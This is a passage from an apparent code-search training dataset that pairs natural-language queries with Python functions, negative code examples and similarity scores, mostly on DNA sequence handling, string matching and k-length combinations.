regex.search(sequence) is not None:\n return True\n else:\n return False", "def dfs(self, s_taken=set(), a_sequence='', 
b_sequence='', a_index=0, b_index=0):\n if a_index < b_index:\n substring = b_sequence[a_index:]\n s_options = self.search_in_tree(self.a_tree, substring)\n elif a_index > b_index:\n substring = a_sequence[b_index:]\n s_options = self.search_in_tree(self.b_tree, substring)\n else:\n s_options = self.s_options_for_beginning\n\n start = min(a_index, b_index)\n for s in s_options:\n if s in self.combination and s not in s_taken:\n a_string = self.a_strings[s]\n b_string = self.b_strings[s]\n a_sequence_new = a_sequence + a_string\n b_sequence_new = b_sequence + b_string\n a_index_new = a_index + len(a_string)\n b_index_new = b_index + len(b_string)\n end = min(a_index_new, b_index_new)\n if a_sequence_new[start:end] == b_sequence_new[start:end]:\n\n if a_index_new == b_index_new:\n if not self.final_sequence:\n self.final_sequence = a_sequence_new\n else:\n self.final_sequence = min(self.final_sequence, a_sequence_new)\n continue\n\n s_taken_new = s_taken.copy()\n s_taken_new.add(s)\n self.dfs(s_taken_new, a_sequence_new, b_sequence_new, a_index_new, b_index_new)", "def process_strings(self):\n for string in self.input:\n matcher = self.choose_algorithm()\n matcher.find_match(string, self.case_insensitive)\n self.__results = matcher.results\n\n if self.counter:\n self.__results = matcher.counts\n\n if self.__results:\n self.output(string)", "def run_example2():\r\n # example for digits\r\n outcomes = set([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\r\n #outcomes = set([\"Red\", \"Green\", \"Blue\"])\r\n #outcomes = set([\"Sunday\", \"Mondy\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\"])\r\n \r\n length = 2\r\n seq_outcomes = gen_all_sequences(outcomes, length)\r\n print \"Computed\", len(seq_outcomes), \"sorted sequences of\", str(length) ,\"outcomes\"\r\n print \"Sequences were\", seq_outcomes", "def aa_generator_DNA(dnaseq):\n return (translate_DNA_codon(dnaseq[n:n+3])\n for n in range(0, len(dnaseq), 3))", "def check_and_clean_sequence(sequence, alphabet):\n if set(sequence).issubset(alphabet):\n return sequence\n else:\n return cleaning_ambiguous_bases(sequence)", "def translate_sequence(sequence, genetic_code = {'GUC': 'V', 'ACC': 'T', 'GUA': 'V', 'GUG': 'V', 'ACU': 'T', 'AAC': 'N', 'CCU': 'P', 'UGG': 'W', 'AGC': 'S', 'AUC': 'I', 'CAU': 'H', 'AAU': 'N', 'AGU': 'S', 'GUU': 'V', 'CAC': 'H', 'ACG': 'T', 'CCG': 'P', 'CCA': 'P', 'ACA': 'T', 'CCC': 'P', 'UGU': 'C', 'GGU': 'G', 'UCU': 'S', 'GCG': 'A', 'UGC': 'C', 'CAG': 'Q', 'GAU': 'D', 'UAU': 'Y', 'CGG': 'R', 'UCG': 'S', 'AGG': 'R', 'GGG': 'G', 'UCC': 'S', 'UCA': 'S', 'UAA': '*', 'GGA': 'G', 'UAC': 'Y', 'GAC': 'D', 'UAG': '*', 'AUA': 'I', 'GCA': 'A', 'CUU': 'L', 'GGC': 'G', 'AUG': 'M', 'CUG': 'L', 'GAG': 'E', 'CUC': 'L', 'AGA': 'R', 'CUA': 'L', 'GCC': 'A', 'AAA': 'K', 'AAG': 'K', 'CAA': 'Q', 'UUU': 'F', 'CGU': 'R', 'CGC': 'R', 'CGA': 'R', 'GCU': 'A', 'GAA': 'E', 'AUU': 'I', 'UUG': 'L', 'UUA': 'L', 'UGA': '*', 'UUC': 'F'}, start_pos = 0):\n #find first orf\n #first_orf_seq = find_first_orf(sequence)\n\n # ensure sequence is uppercase\n seq = sequence.upper()\n\n #translate the sequence\n protein = \"\"\n for i in range(0, len(seq) - (len(seq) % 3), 3):\n codon = seq[i:i + 3]\n if genetic_code[codon] == \"*\":\n break\n protein += genetic_code[codon]\n return protein", "def has_abba(match_obj):\n\tseq = match_obj.group(0)\n\treturn any(map(lambda x: seq[x] != seq[x + 1] and seq[x + 1] == seq[x + 2] and seq[x] == seq[x + 3], range(len(seq) - 3))) # faster because lazy\n\t# return list(filter(lambda x: seq[x] != seq[x + 1] and seq[x + 
1] == seq[x + 2] and seq[x] == seq[x + 3], range(len(seq) - 3)))", "def gene_finder(dna):\n all_orfs_both_strands = find_all_ORFs_both_strands(dna)\n longest_fake_orf = longest_ORF_noncoding(dna, 20)\n for element in all_orfs_both_strands:\n if len(element) > longest_fake_orf:\n a_a_string = coding_strand_to_AA(element)\n else:\n a_a_string = 'not longer than shuffle'\n print(a_a_string)", "def gene_finder(dna):\n viable_strings = []\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# intitialize empty list (for strings)\n viable_amino_acids = []\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# intitialize empty list (for amino acids)\n threshold = longest_ORF_noncoding(dna, 1500)\t\t\t\t\t\t\t\t\t\t\t# sets threshold to longest random dna string\n real_dna = list(find_all_ORFs_both_strands(dna))\t\t\t\t\t\t\t\t\t\t# sets real_dna equal to all the ORFs, both strands\n for i in range(len(real_dna)):\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# searches through all the elements in list real_dna\n \tif len(real_dna[i]) > len(threshold):\t\t\t\t\t\t\t\t\t\t\t\t# compares real string to random string\n \t\tviable_strings.append(real_dna[i])\t\t\t\t\t\t\t\t\t\t\t\t# if real string is longer, adds it to list\n for i in range(len(viable_strings)):\t\t\t\t\t\t\t\t\t\t\t\t\t# searches through all elements in viable_strings\n \ta = coding_strand_to_AA(viable_strings[i])\t\t\t\t\t\t\t\t\t\t\t# translates each string to amino acid sequence\n \tviable_amino_acids.append(a)\t\t\t\t\t\t\t\t\t\t\t\t\t\t# adds amino acids to list\n return viable_amino_acids\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# returns list", "def translate_DNA(dnaseq):\n\n gen = aa_generator_DNA(dnaseq)\n seq = ''\n aa = next(gen, None)\n while aa:\n seq += aa\n aa = next(gen, None)\n return seq", "def is_legit_DNA_sequence(record_seq: str) -> bool:\n nts = {\"A\", \"G\", \"T\", \"C\", \"N\"}\n seq_symbols = {s.upper() for s in record_seq}\n return seq_symbols.issubset(nts)", "def match_all_phrases(self, inphrases):\n# temporary - attempted matches\n attempted_matches = []\n phrase_attempts = {}\n phrase = \"\"\n step = \"A\"\n # ALL full phrases \n for phrase in inphrases:\n phrase_attempts[phrase] = 1\n attempted_matches.append(phrase + ':' + step)\n if phrase in self.cls_phrases:\n match_choices = self.cls_phrases[phrase]\n #return match_choices, attempted_matches, phrase\n return (self.get_list_counts(match_choices), attempted_matches, \n phrase, self.get_most_common(match_choices))\n\n # Normalised version of ALL all full phrases \n phrases = [self.get_normalised_phrase(p) for p in inphrases]\n\n # 3 all prefix trigrams \n step = \"3\"\n for ngram in [p.split()[0:3] for p in phrases if len(p.split()) > 2]:\n phrase = ' '.join(ngram)\n phrase_attempts[phrase] = 1\n attempted_matches.append(phrase + ':' + step)\n if phrase in self.cls_phrases:\n match_choices = self.cls_phrases[phrase]\n return (self.get_list_counts(match_choices), attempted_matches, \n phrase, self.get_most_common(match_choices))\n\n # 2 all prefix bigrams \n step = \"2\"\n for ngram in [p.split()[0:2] for p in phrases if len(p.split()) > 1]:\n phrase = ' '.join(ngram)\n phrase_attempts[phrase] = 1\n attempted_matches.append(phrase + ':' + step)\n if phrase in self.cls_phrases:\n match_choices = self.cls_phrases[phrase]\n return (self.get_list_counts(match_choices), attempted_matches, \n phrase, self.get_most_common(match_choices))\n\n # 1 all valid words \n step = \"1\"\n for phr_elem in phrases:\n #print phr_elem.split()\n for phrase in [w.strip() for w in phr_elem.split() \n if self.isExcluded(w.strip()) == False 
and w.strip() not in phrase_attempts]:\n #print \"***\", phrase\n phrase_attempts[phrase] = 1\n attempted_matches.append(phrase + ':' + step)\n if phrase in self.cls_phrases:\n match_choices = self.cls_phrases[phrase]\n return (self.get_list_counts(match_choices), attempted_matches, \n phrase, self.get_most_common(match_choices))\n\n return [], attempted_matches, phrase, None", "def coding_strand_to_AA_unit_tests(dna, expected):\n print coding_strand_to_AA(\"ATGCGA\")\n print coding_strand_to_AA(\"ATGCCCGCTTT\")\n print coding_strand_to_AA(\"GGTAAA\")\n print \"input: \" + str(dna) + \", expected output: \" + str(expected) + \", actual output: \" + coding_strand_to_AA(dna)", "def seqDiffs(my_seq):\n return ((m.start(0), m.group()) for m in re.finditer('[A-Z]|_+', my_seq))", "def scan_seq(seq, pattern):\n\n # Look for matches in the sequence\n matches = [str(match.group(1)) for match in re.finditer(pattern, seq)]\n\n # Look for matches in the reverse complementary of the sequence\n revcomp_seq = reverse_complementary(seq)\n matches += [str(match.group(1)) for match in re.finditer(pattern, revcomp_seq)]\n\n return matches", "def cands(inputs):\n # The below could probably be simplified a bit....\n return map(''.join, list(itertools.chain.from_iterable([ map (list, (itertools.permutations(inputs, x))) for x in range(4, len(inputs)+1)])))", "def coding_strand_to_AA(dna):\n dnainp = dna\n protein = ''\n if len(dnainp)<3:\n return \"ERROR: The provided fragment is too short to contain any codons.\"\n# elif len(dnainp)%3 is not 0:\n# print \"Warning: The provided DNA fragment does not contain an integer number of codons. Excess bases were leftout.\"\n while len(dnainp) >=3:\n cod = dnainp[:3]\n for i in codons:\n for j in i:\n if j == cod:\n protein = protein + aa[codons.index(i)]\n dnainp = dnainp[3:]\n return protein", "def final_finder(self, seq, init_length, fs):\n# print('call final_finder, input = '+seq)\n where_final=seq[init_length:]\n if len(where_final)>0:\n letter=where_final[0]\n if letter in fs:\n if len(where_final) > 1:\n yo = where_final[0] == 'ё'\n o = where_final[0] == 'о'\n if yo:\n final = where_final[0]\n len_final = 1\n elif o:\n if where_final[1] == 'й':\n final = where_final[:2]\n len_final = 2\n else:\n final = where_final[:1]\n len_final = 1\n elif where_final[1] in ['й','и','о','ю','у']:\n if where_final[:2] in fs:\n final=where_final[:2]\n len_final = 2\n else:\n final = letter\n len_final = 1\n elif where_final[1] == 'н':\n# print('second letter = n')\n# print('check')\n if len(where_final) > 2:\n if where_final[2] == 'ь' or where_final[2] == 'г':\n# print('third letter = ь or г')\n soft_sign = where_final[2] == 'ь'\n g = where_final[2] == 'г'\n if where_final[:3] in fs:\n# print('now find out if its rather initial')\n if len(where_final) > 3 and soft_sign:\n final = where_final[:3]\n len_final = 3\n elif len(where_final) > 3 and g:\n if where_final[3] in ['а','о','у','ы','э','я','ё','ю','и','е','ь']:\n final = where_final[:2]\n len_final = 2\n else:\n final = where_final[:3]\n len_final = 3\n else:\n final = where_final[:3]\n len_final = 3\n else:\n# print('no, theres no such combination of 3 symbols')\n final = where_final[:2]\n len_final = 2\n elif where_final[2] in ['а','о','у','ы','э','я','ё','ю','и','е']:\n# print('third letter = vowel')\n final = where_final[:1]\n len_final = 1\n else:\n final=where_final[:2]\n len_final = 2\n\n else:\n final=where_final[:2]\n len_final = 2\n\n else:\n final=where_final[0]\n len_final = 1\n else:\n final=where_final[0]\n 
len_final = 1\n elif where_final[:2] == 'йо':\n final = where_final[:2]\n len_final = 2\n else:\n# print('no such symbol, whitespace or Ъ')\n if letter == ' ':\n final='_'\n len_final = 1\n elif letter == 'ъ':\n final = '_'\n len_final = 1\n else:\n final = '_'\n len_final = 0\n else:\n final='_'\n len_final = 0 \n# print(final)\n return final, len_final", "def get_combinations_regexp(values):\n result = []\n for value in values:\n result.extend([value.lower(), value.upper(), value.title()])\n return '|'.join(result)", "def typoglycemia(sequence):\n words = sequence.split()\n\t\n for i in range(len(words)):\n if len(words[i]) > 4:\n word_partial = list(words[i][1:-1])\n random.shuffle(word_partial)\n word_shuffle = \"\".join(word_partial)\n words[i] = words[i][0] + word_shuffle + words[i][-1]\n \n return ' '.join(words)", "def match_accession(accession, rules_by_prefix_len):\n\n letter_match = LETTER_RE.match(accession)\n if letter_match is None:\n raise ValueError('an accession number must start with at least one capital letter, this does not: ' + accession)\n letter_prefix = letter_match.group(0)\n letter_match_length = len(letter_prefix)\n accession_type = ''\n if letter_match_length == 0:\n # this should never happen\n raise ValueError('an accession number must start with at least one capital letter, this does not: ' + accession)\n if letter_match_length < 3:\n accession_type = 'nucleotide'\n elif letter_match_length < 4:\n if letter_prefix in ('SRA', 'SRP', 'SRX', 'SRR', 'SRS', 'SRZ',\n 'ERA', 'ERP', 'ERX', 'ERR', 'ERS', 'ERZ',\n 'DRA', 'DRP', 'DRX', 'DRR', 'DRS', 'DRZ'):\n accession_type = 'SRA'\n else:\n accession_type = 'protein'\n elif letter_match_length in (4, 6):\n accession_type = 'WGS'\n elif letter_match_length == 5:\n accession_type = 'MGA'\n else:\n raise ValueError('an accession number must start with less than 7 capital letters, this does not: ' + accession_type)\n\n if accession[2] == '_':\n # details from https://www.ncbi.nlm.nih.gov/books/NBK21091/table/ch18.T.refseq_accession_numbers_and_mole/?report=objectonly\n # thanks to Torsten Seemann\n for prefix, database, molecule_type, type_description in rules_by_prefix_len['RefSeq']:\n accession_type = molecule_type\n if accession[:3] == prefix:\n return (database, accession_type, 'RefSeq: ' + type_description)\n\n rules = rules_by_prefix_len[letter_match_length]\n for rule in rules:\n (matcher, database, _, type_description) = rule\n if (isinstance(matcher, RuleMatcher) and matcher.matches(accession)) or letter_prefix == matcher:\n return (database, accession_type, type_description)", "def test_assign_seqs_fasta_plus_qual(self):\r\n\r\n # Handles single fasta and single qual\r\n file_data = {}\r\n file_data['fasta_files'] = [self.valid_fasta_file_no_errors]\r\n file_data['qual_files'] = [self.valid_qual_file_no_errors]\r\n file_data['demultiplexed_seqs_f'] = FakeOutFile()\r\n file_data['demultiplexed_qual_f'] = FakeOutFile()\r\n\r\n ids_bcs_added_field = {('AACTCGTCGATG', ''): 's1',\r\n ('AGCAGCACTTGT', ''): 's2', ('ACCGCAGAGTCA', ''): 's3'}\r\n bc_lens = [12]\r\n all_bcs = ['AACTCGTCGATG', 'AGCAGCACTTGT', 'ACCGCAGAGTCA']\r\n keep_barcode = False\r\n barcode_type = \"golay_12\"\r\n max_bc_errors = 1.5\r\n start_index = 1\r\n write_unassigned_reads = False\r\n disable_bc_correction = False\r\n added_demultiplex_field = None\r\n\r\n log_data, bc_freqs, seq_counts, corrected_bc_count =\\\r\n assign_seqs(file_data, ids_bcs_added_field, bc_lens, all_bcs,\r\n keep_barcode, barcode_type, max_bc_errors, start_index,\r\n 
write_unassigned_reads, disable_bc_correction,\r\n added_demultiplex_field)\r\n\r\n expected_demultiplexed_fasta_seq = \">s1_1 ABCD0001 orig_bc=AACTCGTCGATG new_bc=AACTCGTCGATG bc_diffs=0\\nCAGGACGAGACGAGGTT\\n>s3_2 EFGH0002 orig_bc=ACCGCAGAGTCA new_bc=ACCGCAGAGTCA bc_diffs=0\\nCCAGATTACGAGATTA\\n>s2_3 IJKL0003 orig_bc=AGCAGCACTTGT new_bc=AGCAGCACTTGT bc_diffs=0\\nGACCGATTACGATAACG\\n\"\r\n expected_demultiplexed_qual_seq = '>s1_1 ABCD0001 orig_bc=AACTCGTCGATG new_bc=AACTCGTCGATG bc_diffs=0\\n30 26 11 11 29 20 19 16 24 17 29 28 11 27 14 24 24\\n>s3_2 EFGH0002 orig_bc=ACCGCAGAGTCA new_bc=ACCGCAGAGTCA bc_diffs=0\\n12 14 27 23 22 19 24 18 19 20 28 10 17 14 17 13\\n>s2_3 IJKL0003 orig_bc=AGCAGCACTTGT new_bc=AGCAGCACTTGT bc_diffs=0\\n10 20 16 20 25 27 22 28 16 22 16 18 12 13 16 25 17\\n'\r\n\r\n self.assertEqual(file_data['demultiplexed_seqs_f'].data,\r\n expected_demultiplexed_fasta_seq)\r\n self.assertEqual(file_data['demultiplexed_qual_f'].data,\r\n expected_demultiplexed_qual_seq)\r\n\r\n expected_log_data = {'ACCGCAGAGTCA,s3': 1, 'AACTCGTCGATG,s1': 1,\r\n 'AGCAGCACTTGT,s2': 1}\r\n expected_bc_freqs = {'AACTCGTCGATG': 1, 'AGCAGCACTTGT': 1,\r\n 'ACCGCAGAGTCA': 1}\r\n expected_seq_counts = 3\r\n expected_corrected_bc_count = [0, 0]\r\n\r\n self.assertEqual(log_data, expected_log_data)\r\n self.assertEqual(bc_freqs, expected_bc_freqs)\r\n self.assertEqual(seq_counts, expected_seq_counts)\r\n self.assertEqual(corrected_bc_count, expected_corrected_bc_count)", "def getSecondStrand(sequences):\n compDNA = []\n for dna in sequences:\n compDNAAux = dna.replace('A', 't')\n compDNAAux = compDNAAux.replace('T', 'a')\n compDNAAux = compDNAAux.replace('C', 'g')\n compDNAAux = compDNAAux.replace('G', 'c')\n compDNA.append(compDNAAux.upper())\n\n for i in range(0, len(compDNA)):\n compDNA[i] = compDNA[i][::-1]\n\n return compDNA", "def initial_finder(self, seq, ins):\n# print('call initial_finder, input = '+seq)\n letter=seq[0]\n if letter in ins:\n if letter in ['д','т','ц','с']:\n next_letter=seq[:2]\n if next_letter in ins:\n initial=next_letter\n len_init=2\n else:\n initial=letter\n len_init=1\n else:\n initial=letter\n len_init=1 \n else:\n initial='_'\n len_init=0\n# print(initial)\n return initial, len_init", "def trifeca(word: str):\n last_letter = 'None'\n last_pair_matched = False\n consecutive_matching_pairs = 0\n\n for letter in word:\n if last_pair_matched:\n last_pair_matched = False\n last_letter = letter\n continue\n\n if letter == last_letter:\n last_pair_matched = True\n consecutive_matching_pairs += 1\n \n if consecutive_matching_pairs == 3:\n return True\n else:\n consecutive_matching_pairs = 0\n last_letter = letter \n \n return False", "def transcribe(seq):\n rna = ''\n for letter in seq:\n if letter == 'A':\n rna = rna + 'U'\n elif letter == 'T':\n rna = rna + 'A'\n elif letter == 'G':\n rna = rna + 'C'\n else:\n rna = rna + 'G'\n return rna", "def process_sequences(sequences: list):\n transformed_sequences = transform_sequences(sequences)\n profile = calculate_profile(transformed_sequences)\n consensus = get_consensus(profile)\n\n print(consensus)\n bases = [\"A\", \"C\", \"G\", \"T\"]\n for i, counts in enumerate(profile):\n counts = [str(count) for count in counts]\n print(\"{}: {}\".format(bases[i], \" \".join(counts)))", "def find_substitutes(text):\n if CHAINS == {}:\n generate_food_chains()\n\n candidates = []\n subs = []\n for i in range(len(text)):\n char = text[i]\n if CHAINS.get(char):\n candidates = []\n candidates = CHAINS[char]\n else:\n if candidates != []:\n # 
choose the most popular option from candidates\n counts = {}\n for candidate in candidates:\n if counts.get(candidate):\n counts[candidate] += 1\n else:\n counts[candidate] = 1\n max_count = 0\n chosen = None\n for candidate, count in counts.iteritems():\n if count > max_count:\n max_count = count\n chosen = candidate\n if chosen:\n subs.append((chosen, i))\n\n candidates = []\n return subs", "def convert_ambigs(strings, alph):\n ms = alph.translator(False)\n for i in range(len(strings)):\n strings[i] = strings[i].translate(ms)\n return(strings)", "def only_choice(values):\n for unit in unitlist:\n for d in '123456789':\n # array of boxes for the digit d\n destinations = [b for b in unit if d in values[b]]\n if len(destinations) == 1:\n values = assign_value(values, destinations[0], d)\n return values", "def sequence_align(string_v, string_w):\n m = len(string_v)\n n = len(string_w)\n\n # Initialization; D[i][j][0] contains the max alignment score of the\n # ith prefix of v and the jth of w; D[i][j][1] contains the back pointer.\n D = [[(0, START) for _ in range(n + 1)] for _ in range(m + 1)]\n\n for i in range(1, m + 1):\n D[i][0] = (D[i - 1][0][0] + blosum['-', string_v[i - 1]], DELETE)\n\n for j in range(1, n + 1):\n D[0][j] = (D[0][j - 1][0] + blosum['-', string_w[j - 1]], INSERT)\n\n # Recurrence\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n insert = D[i][j-1][0] + blosum['-', string_w[j - 1]]\n delete = D[i-1][j][0] + blosum[string_v[i - 1], '-']\n substitute = D[i-1][j-1][0] + blosum[string_v[i - 1], string_w[j - 1]]\n # Set D[i][j] to the max of the recurrences\n if insert > delete and insert > substitute:\n D[i][j] = (insert, INSERT)\n elif delete > substitute:\n D[i][j] = (delete, DELETE)\n else:\n D[i][j] = (substitute, SUBSTITUTE)\n\n i, j = m, n\n v_aligned = ''\n w_aligned = ''\n back_pointer = D[i][j][1]\n while back_pointer != START:\n if back_pointer == INSERT:\n j -= 1\n v_aligned = '-' + v_aligned\n w_aligned = string_w[j] + w_aligned\n\n \n elif back_pointer == DELETE:\n i -= 1\n v_aligned = string_v[i] + v_aligned\n w_aligned = '-' + w_aligned\n\n elif back_pointer == SUBSTITUTE:\n i -= 1\n j -= 1\n v_aligned = string_v[i] + v_aligned\n w_aligned = string_w[j] + w_aligned\n\n \n back_pointer = D[i][j][1]\n \n return v_aligned, w_aligned", "def createAlignment(sequences, alphabet):\n align = Alignment(alphabet)\n counter = 0\n for sequence in sequences:\n name = \"sequence\" + str(counter)\n align.add_sequence(name, sequence)\n counter+=1\n return align" ]
[ "0.58296806", "0.57344776", "0.57000065", "0.569295", "0.5626267", "0.5622596", "0.56082696", "0.56058365", "0.5604716", "0.55872947", "0.5555464", "0.5515502", "0.55089283", "0.54992986", "0.5488709", "0.5476587", "0.54706156", "0.54512507", "0.5450281", "0.5441451", "0.54327196", "0.542411", "0.5411", "0.54061323", "0.53986025", "0.5391094", "0.53775454", "0.53768015", "0.53597414", "0.53574", "0.5323872", "0.53233784", "0.53160083", "0.53122944", "0.5299169", "0.5299169", "0.5299169", "0.5299169", "0.5299169", "0.5299169", "0.5299169", "0.5299169", "0.5299169", "0.5278213", "0.527145", "0.5270026", "0.52620333", "0.5256478", "0.5242583", "0.522927", "0.5223555", "0.5220937", "0.52117187", "0.5210697", "0.5202933", "0.5201367", "0.5199239", "0.51977617", "0.5194704", "0.51941395", "0.5190418", "0.51876783", "0.5185242", "0.51695544", "0.5168487", "0.5168165", "0.51608324", "0.5158871", "0.5149529", "0.51388264", "0.5138707", "0.5136198", "0.51327264", "0.51302856", "0.5126118", "0.51260537", "0.51194453", "0.5118848", "0.5109988", "0.51090217", "0.5105424", "0.51038414", "0.51034504", "0.510108", "0.50966793", "0.50957364", "0.5090317", "0.50850147", "0.50835884", "0.50781256", "0.50778294", "0.50690264", "0.50637543", "0.5063092", "0.5059926", "0.50532407", "0.5052397", "0.5048314", "0.5043831", "0.50389993" ]
0.5192423
60
generates all subsequences of ch with length k
import itertools

def generateSubSequences(k, ch):
    seq = ["".join(c) for c in itertools.product(ch, repeat=k)]
    # discussion about the best way to do this:
    # https://stackoverflow.com/questions/7074051/what-is-the-best-way-to-generate-all-possible-three-letter-strings
    return seq
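if __name__ == "__main__":
    # A minimal usage sketch (illustrative; assumes only the definition above).
    # itertools.product(ch, repeat=k) enumerates every k-tuple over the
    # alphabet ch, so the result contains len(ch) ** k strings.
    print(generateSubSequences(2, "AB"))         # ['AA', 'AB', 'BA', 'BB']
    print(len(generateSubSequences(3, "ACGT")))  # 64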
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_kmers(seq, k):\n\n return [seq[i:i+k] for i in range(len(seq)-k+1)]", "def cut_kmer(sequence, k_mer):\n for i in range(0, len(sequence)-k_mer + 1):\n yield sequence[i:i+k_mer]", "def kmer_list(s, k):\n kmer = []\n n = len(s)\n # n-k+1 is the available range of values or probablities.\n for x in range(0, n-k+1):\n kmer.append(s[x:x+k])\n return kmer", "def __permutation(orgset, k):\n if k == 1:\n for i in orgset:\n yield (i,)\n elif k > 1:\n for i, x in enumerate(orgset):\n # iterates though to near the end\n for s in __permutation(orgset[:i] + orgset[i + 1 :], k - 1):\n yield (x,) + s", "def pattern_list(k):\r\n p_list=[]\r\n for i in list(itertools.product('ACGT', repeat=k)):\r\n x = ''.join(i)\r\n p_list.append(x)\r\n return p_list", "def get_kmers(seq,k=2):\n pair_list = []\n for i in range(0,len(seq),k):\n pair_list.append(str(seq)[i:i+k])\n return pair_list", "def kmer_set(s, k):\n kmer = set([])\n n = len(s)\n #n-k+1 is the available range of values or probablities.\n for x in range(0, n - k + 1):\n kmer.add(s[x:x + k])\n return kmer", "def get_subsets(l, k):\n if k == 0:\n return [[]]\n else:\n res = []\n for i in range(len(l)):\n rest_subsets = get_subsets(l[i + 1:], k - 1)\n for subset in rest_subsets:\n subset.insert(0, l[i])\n res += rest_subsets\n return res", "def seq_reconstruct(k, d, kmers):\n seq = []\n for p in kmers:\n seq.append(p[0])\n for i in reversed(range(1, 2 * k + d - 1)):\n print(i)\n seq.append(kmers[-i][-1])\n return \"\".join(seq)", "def shingle(s, k):\n k = min(len(s), k)\n for i in range(len(s) - k + 1):\n yield s[i:i+k]", "def cut_kmer(sequence, kmer_size):\n for i in range(len(sequence)-kmer_size+1):\n yield sequence[i:i+kmer_size]", "def get_all_pandigitals(i, k):\n l = range(i, k + 1)\n return itertools.permutations(l)", "def get_paths_of_length_k(subpaths, k):\r\n subpaths_of_length_k = [i for i in subpaths if len(\r\n i) == k] # all k-length subpaths\r\n subpaths = [i for i in subpaths if len(i) != k] # remove k-length subpaths\r\n return subpaths_of_length_k, subpaths", "def get_subsequence(a, k):\n if k > len(a):\n return None\n dp = [0] * len(a)\n aux = [inf] * (k + 1)\n aux[0] = -inf\n high = 0\n for i in range(len(a)):\n dp[i] = bisect_left(aux, a[i])\n aux[dp[i]] = min(aux[dp[i]], a[i])\n high = max(high, dp[i])\n if high == k:\n return aux[1:]\n return None", "def iter_strings_k(n, k, m):\n # initial state -- all zeros\n state = np.zeros((n,), dtype=int)\n\n if k == 0:\n # that was it (!)\n return\n\n while True:\n #print(f\"next state is {state=}\")\n yield state\n\n # Update to next state. Idea is to count and carry as usual, except if\n # there are already k nonzeros in which case we count and carry by\n # ignoring all the trailing zeros. This is the algorithm described here\n # - https://stackoverflow.com/a/10458380/1694896 - adapted from bits to\n # base-m \"mits\"\n if np.count_nonzero(state) < k:\n _add_and_carry_in_place(state, m)\n continue\n\n # there are k nonzeros already, find first nonzero from least\n # significant end. 
See https://stackoverflow.com/a/52911347/1694896\n last_nonzero = np.max(np.nonzero(state))\n # and increment that one\n _add_and_carry_in_place(state, m, last_nonzero)\n if not np.any(state):\n # end of iteration reached, as we've gone back to the all-zero\n # state.\n return", "def find_partitions(V,k):\n k_subs = k_subset(V,k)\n k_subs = uniq_subsets(k_subs)\n\n return k_subs", "def TAoCPpermutation(n,k):\n perms = []\n for subset in itertools.combinations(range(n), k):\n A = []; B = []; C = []; min = 0; j = 0; up = 0\n for i in xrange(n):\n if(j>=k or i != subset[j]):\n B.append(i)\n up +=1\n else:\n up -=1\n j += 1\n if(up < min):\n min = up\n B.append(i)\n else:\n A.append(i)\n C.append(B.pop())\n perms.append(A+B+C)\n return perms", "def kmer(text, i, k):\r\n return text[i:(i+k)]", "def kmer(text, i, k):\r\n return text[i:(i+k)]", "def Combinations(n, k):\n if int(n) != n or int(k) != k or n < k or k <= 0:\n return None\n\n if k == n:\n return [range(n)]\n elif k == 1:\n return [[ii] for ii in range(n)]\n\n combinations = Combinations(n-1, k)\n combinations_append_last = Combinations(n-1, k-1)\n for ii in range(len(combinations_append_last)):\n combination = combinations_append_last[ii]\n combination.append(n-1)\n combinations.append(combination)\n return combinations", "def randomKmers(dna, k):\n kmers = []\n for seq in dna:\n n = len(seq)\n i = random.randint(0, n-k)\n kmer = seq[i:i+k]\n kmers.append( kmer)\n return kmers", "def generate_kmers(k):\n\n kmers_list = []\n kmers_tuples = itertools.product('ACGT', repeat=k)\n for kmer in kmers_tuples:\n kmers_list.append(''.join(kmer))\n\n return kmers_list", "def de_bruijn(k, n):\n alphabet = k\n k = len(k)\n\n a = [0] * k * n\n sequence = []\n\n def db(t, p):\n if t > n:\n if n % p == 0:\n sequence.extend(a[1:p + 1])\n else:\n a[t] = a[t - p]\n db(t + 1, p)\n for j in range(a[t - p] + 1, k):\n a[t] = j\n db(t + 1, t)\n\n db(1, 1)\n sequence.extend(sequence[:n - 1])\n\n return \"\".join(alphabet[i] for i in sequence)", "def subsets(x, k):\n sub_set = set()\n for i in x:\n sub_set = sub_set.union(set(combinations(i, k)))\n return list(sub_set)", "def partitions(n, k):\n if k == 1:\n yield (n,)\n return\n for i in range(1, n):\n for p in partitions(n-i, k-1):\n yield (i,) + p", "def beautifulSubsets(self, nums: List[int], k: int) -> int:\n\n \"\"\"\n queue = deque([([], -1)])\n res = 0\n\n while queue:\n cur, idx = queue.popleft()\n res += 1\n\n for i in range(idx + 1, len(nums)):\n if nums[i] - k in cur or nums[i] + k in cur:\n continue\n\n queue.append((cur + [nums[i]], i))\n\n return res - 1\n \"\"\"\n\n \"\"\"\n # dp0 is the ways that without A[i]\n # dp1 is the ways that with A[i]\n\n count = [Counter() for i in range(k)]\n for n in nums:\n count[n % k][n] += 1\n\n res = 1\n for i in range(k):\n prev, dp0, dp1 = 0, 1, 0\n for n in sorted(count[i]):\n v = pow(2, count[i][n])\n if prev + k == n:\n dp0, dp1 = dp0 + dp1, dp0 * (v - 1)\n else:\n dp0, dp1 = dp0 + dp1, (dp0 + dp1) * (v - 1)\n\n prev = n\n\n res *= dp0 + dp1\n\n return res - 1\n \"\"\"\n\n # Count the frequency of A, and then consider all the arithmetic sequence with difference k.\n # Each arithmetic sequence can be solve as a hourse robber problem.\n # We solve the hourse robber by dp.\n # dp(a) return the result for sequence no bigger than a.\n\n # dp(a)[0] is the ways that without a\n # dp(a)[1] is the ways that with a\n\n # dp(a)[0] = dp(a - k)[0] + dp(a - k)[1]\n # dp(a)[1] = dp(a - k)[0] * (2 ^ count(a) - 1\n\n count = Counter(nums)\n\n def dp(n):\n dp0, dp1 = dp(n 
